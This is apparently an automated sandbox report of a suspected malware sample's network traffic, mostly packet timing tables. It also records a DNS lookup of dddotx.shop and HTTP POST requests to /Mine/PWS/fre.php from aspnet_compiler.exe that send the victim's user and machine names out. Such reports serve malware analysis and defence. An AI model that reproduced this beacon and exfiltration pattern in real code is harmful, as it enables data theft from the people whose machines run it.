                  Sep 25, 2024 15:30:17.335068941 CEST8055982188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.484476089 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:17.489536047 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.489618063 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:17.492960930 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:17.497807980 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:17.497859955 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:17.502636909 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.191195965 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.191484928 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.191988945 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.192085981 CEST5598380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.196346045 CEST8055983188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.351236105 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.356179953 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.356296062 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.358325958 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.363125086 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:18.363198042 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:18.368141890 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.039804935 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.039901972 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.039963961 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.040005922 CEST5598480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.044869900 CEST8055984188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.187561035 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.192501068 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.192579985 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.194960117 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.199775934 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.199856043 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.204660892 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.925561905 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.925617933 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:19.925797939 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.925797939 CEST5598580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:19.932506084 CEST8055985188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:20.079291105 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:20.084664106 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:20.087739944 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:20.089766979 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:20.094580889 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:20.095707893 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:20.100594997 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.354742050 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.354770899 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.354784012 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.354896069 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.355001926 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.355001926 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.355001926 CEST5598680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.361414909 CEST8055986188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.493887901 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.498930931 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.499090910 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.502037048 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.506910086 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:21.507010937 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:21.511852026 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.975692987 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.975730896 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.975749016 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.975845098 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:22.975958109 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:22.975959063 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:22.977467060 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.977538109 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:22.977809906 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:22.977869034 CEST5598780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:22.980750084 CEST8055987188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:23.121572971 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:23.126583099 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:23.126693964 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:23.129600048 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:23.134391069 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:23.134473085 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:23.139282942 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.171243906 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.171304941 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.171319008 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.171451092 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.171684980 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.171684980 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.173330069 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.173403978 CEST5598880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.176420927 CEST8055988188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.337969065 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.343002081 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.343240023 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.345341921 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.350214958 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:24.350366116 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:24.355207920 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.134206057 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.134380102 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.135917902 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.136003017 CEST5598980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.139379025 CEST8055989188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.278228045 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.283240080 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.283344984 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.285468102 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.290340900 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:25.290427923 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:25.295272112 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.009540081 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.009752035 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.009915113 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.009969950 CEST5599080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.014599085 CEST8055990188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.153695107 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.160137892 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.160242081 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.163558960 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.169898987 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.169979095 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.174781084 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.831254005 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.831403017 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.832192898 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.832254887 CEST5599180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.836287022 CEST8055991188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.988715887 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.993736029 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:26.993880987 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:26.995888948 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.001055956 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.001128912 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.006150007 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.737901926 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.738070965 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.738923073 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.738979101 CEST5599280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.742914915 CEST8055992188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.886835098 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.892074108 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.892175913 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.894305944 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.899205923 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:27.899264097 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:27.904031992 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.608217955 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.608408928 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.608480930 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.608531952 CEST5599380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.613287926 CEST8055993188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.741399050 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.746436119 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.746531963 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.748756886 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.753787041 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:28.753856897 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:28.758718014 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.440074921 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.440171003 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.440258026 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.440295935 CEST5599480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.447187901 CEST8055994188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.599030018 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.607183933 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.607436895 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.609441042 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.617997885 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:29.618077993 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:29.623727083 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.271070004 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.271297932 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.271567106 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.271632910 CEST5599580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.276618004 CEST8055995188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.416717052 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.421694994 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.421776056 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.423810005 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.428625107 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:30.428677082 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:30.433685064 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.121346951 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.121473074 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.122096062 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.122148037 CEST5599680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.126338005 CEST8055996188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.260112047 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.265669107 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.265773058 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.267951965 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.272900105 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.273027897 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.277909040 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.982772112 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.982949018 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.983717918 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:31.983771086 CEST5599780192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:31.987763882 CEST8055997188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.119256020 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.126650095 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.126734018 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.128866911 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.135504007 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.135559082 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.140319109 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.891236067 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.891448021 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.892426014 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:32.892501116 CEST5599880192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:32.896265984 CEST8055998188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.039958954 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.212762117 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.212939024 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.250965118 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.255919933 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.256021976 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.260803938 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.916858912 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.917047024 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.917727947 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:33.917788029 CEST5599980192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:33.921905994 CEST8055999188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:34.061343908 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:34.066286087 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:34.066389084 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:34.068444014 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:34.073287010 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:34.073487997 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:34.078353882 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.635847092 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.635879040 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.635894060 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.635958910 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.635989904 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.636066914 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.637883902 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.637940884 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.638684988 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.639128923 CEST5600080192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.642303944 CEST8056000188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.789169073 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.794101954 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.794209957 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.796345949 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.801126957 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:35.801198006 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:35.805986881 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:36.512485981 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:36.512574911 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:36.514772892 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:36.514822006 CEST5600180192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:36.517407894 CEST8056001188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:36.746464968 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.756983042 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.762015104 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:37.762140036 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.765178919 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.766448021 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:37.766503096 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.771471977 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:37.771542072 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:37.776333094 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.532172918 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.532636881 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.532749891 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.532751083 CEST5600280192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.539438009 CEST8056002188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.694626093 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.701363087 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.703809977 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.703809977 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.710664034 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:38.713861942 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:38.720715046 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.444228888 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.444328070 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.445180893 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.445242882 CEST5600380192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.450411081 CEST8056003188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.582847118 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.587601900 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.587675095 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.589740038 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.594510078 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:39.594556093 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:39.599339962 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.283212900 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.283415079 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.283788919 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.283848047 CEST5600480192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.288332939 CEST8056004188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.419676065 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.425071001 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.425192118 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.427402973 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.433042049 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:40.433960915 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:40.440399885 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.170823097 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.170973063 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.171663046 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.171722889 CEST5600580192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.175888062 CEST8056005188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.400917053 CEST5600680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.405771017 CEST8056006188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.405868053 CEST5600680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.407851934 CEST5600680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.412801981 CEST8056006188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:41.413983107 CEST5600680192.168.2.4188.114.96.3
                  Sep 25, 2024 15:30:41.418786049 CEST8056006188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:42.063430071 CEST8056006188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:42.064240932 CEST8056006188.114.96.3192.168.2.4
                  Sep 25, 2024 15:30:42.064291000 CEST5600680192.168.2.4188.114.96.3
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 15:28:36.779702902 CEST5212753192.168.2.41.1.1.1
                  Sep 25, 2024 15:28:36.791651011 CEST53521271.1.1.1192.168.2.4
                  Sep 25, 2024 15:28:51.014931917 CEST53555081.1.1.1192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Sep 25, 2024 15:28:36.779702902 CEST192.168.2.41.1.1.10xaf8bStandard query (0)dddotx.shopA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Sep 25, 2024 15:28:36.791651011 CEST1.1.1.1192.168.2.40xaf8bNo error (0)dddotx.shop188.114.96.3A (IP address)IN (0x0001)false
                  Sep 25, 2024 15:28:36.791651011 CEST1.1.1.1192.168.2.40xaf8bNo error (0)dddotx.shop188.114.97.3A (IP address)IN (0x0001)false
                  • dddotx.shop
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:36.803759098 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 176
                  Connection: close
                  Sep 25, 2024 15:28:36.808752060 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: 'ckav.rujones134349JONES-PCk0FDD42EE188E931437F4FBE2CRF9Rb
                  Sep 25, 2024 15:28:37.469983101 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:28:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzrtz%2FQF0X2cAeLlFJWI2z%2BAeAdP1etxRyi%2Fzh69K%2FYSgYngPgGa4HNOw3eP1bgcepWOE%2BAKIl7reduOnaGLl4kk%2BWu3IHn%2FRDQW%2F3lSf2wT5MlXhnwD0xHzrx7DBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5bc08ddb0ca4-EWR
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449731188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:28:37.782362938 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
